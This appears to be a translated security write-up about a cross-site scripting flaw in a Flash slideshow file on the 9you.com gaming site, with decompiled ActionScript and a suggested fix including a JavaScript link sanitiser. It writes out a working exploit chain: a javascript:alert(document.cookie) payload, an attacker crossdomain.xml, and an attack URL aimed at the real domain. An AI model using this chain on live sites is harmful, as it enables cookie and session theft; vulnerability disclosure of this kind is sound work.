In-depth analysis and utilization of FLASH Security Issues of jiuyou Network (I)

Source: Internet
Author: User

getURL security issues.

Case: lh.9you.com/web_v3/bcastr.swf?bcastr_xml_url=xml/bcastr.xml

This is how the SWF is called: the parameter names an external configuration or data file for it to load, such as an .xml file. Flash ActionScript currently exists in two versions on the network, 2.0 and 3.0, and the function that opens a link is as follows in each:

    // as3.0
    navigateToURL(new URLRequest(parameter), "_self");
    // as2.0
    getURL(parameter, "_self");

The case here is 2.0. The parameter is the link to open. If the parameter is "javascript:alert(1)", JavaScript code is executed. Here the code runs on click, with an effect similar to <a href="javascript:alert(1)">click me to pop up 1</a>.

Let's take a look at the information in the xml configuration file: item_url is the address of the displayed image, and link is the parameter for the jump when the image is clicked; this is the controllable parameter mentioned above.

Decompiling this swf, we find code like the following:

    getURL(bcastr_link_array[this.id], "_blank");

We can see from the variable name that bcastr_link_array is the array of link tags, so we trace bcastr_link_array:

    bcastr_link_array = new Array();
    .............................
    while (i < item_total_num) {
        bcastr_flie_array.push(bcastr_xml.firstChild.childNodes[i].attributes.item_url);
        bcastr_title_array.push(bcastr_xml.firstChild.childNodes[i].attributes.itemtitle);
        bcastr_link_array.push(bcastr_xml.firstChild.childNodes[i].attributes.link);
        ++i;
    }

This proves our conjecture: the arrays are assigned their values in a loop over the XML items.

Vulnerability exploitation: change the address in the link tag to our attack code, such as javascript:alert(document.cookie);

Cross-domain handling: place a crossdomain.xml under the root directory of our website:

    <?xml version="1.0"?>
    <cross-domain-policy>
    <allow-access-from domain="" />
    </cross-domain-policy>

In this example, the website value is changed to *.9you.com (matches any 9you.com subdomain).

Final attack link: http://lh.9you.com/web_v3/bcastr.swf?bcastr_xml_url=http://127.0.0.1:8080/bcastr.xml

http://127.0.0.1:8080/bcastr.xml is the environment I have set up. Click the image in it.

Solution:

Validate the link URL passed in the XML with a regular expression, or restrict loading of XML files from third-party websites. If you have checked these swf files, I will not refresh them.
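
The two checks from the solution above, sketched in JavaScript as an added example (not code from the original article or from bcastr). The function names and sample item values are assumptions, and the logic would have to be ported to ActionScript to run inside the SWF itself:

```javascript
// Added example; function names and sample values are assumptions.

// Mirror what URL parsers do before reading a scheme: drop tab/CR/LF anywhere
// and leading control characters or spaces, so " java\tscript:" is caught.
function normalize(raw) {
  return String(raw).replace(/[\t\r\n]/g, "").replace(/^[\u0000-\u0020]+/, "");
}

// Check 1: the `link` attribute that ends up in getURL(). Allowlist only:
// http(s) URLs or scheme-less relative paths pass; javascript:, data:, etc. fail.
function isSafeLink(raw) {
  const url = normalize(raw);
  if (url === "") return false;
  const m = /^([a-z][a-z0-9+.\-]*):/i.exec(url);
  if (m === null) return true; // no scheme: relative reference
  const scheme = m[1].toLowerCase();
  return scheme === "http" || scheme === "https";
}

// Check 2: the bcastr_xml_url parameter. Resolve it against the URL the SWF
// is served from and accept it only if it stays on the same origin.
function isAllowedConfigUrl(raw, swfUrl) {
  try {
    return new URL(normalize(raw), swfUrl).origin === new URL(swfUrl).origin;
  } catch (e) {
    return false; // unparsable input is rejected
  }
}

// Apply check 1 to parsed <item> attributes: keep the image, blank a bad link.
function sanitizeItems(items) {
  return items.map((it) => ({ ...it, link: isSafeLink(it.link) ? it.link : "" }));
}

// Constructed sample data, using the attribute names from the decompiled code.
const SWF_URL = "http://lh.9you.com/web_v3/bcastr.swf";
const sampleItems = [
  { item_url: "images/1.jpg", itemtitle: "ok", link: "http://lh.9you.com/news.html" },
  { item_url: "images/2.jpg", itemtitle: "bad", link: "javascript:alert(document.cookie)" },
];

console.log(sanitizeItems(sampleItems).map((it) => it.link));
console.log(isAllowedConfigUrl("xml/bcastr.xml", SWF_URL));
console.log(isAllowedConfigUrl("http://127.0.0.1:8080/bcastr.xml", SWF_URL));
```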
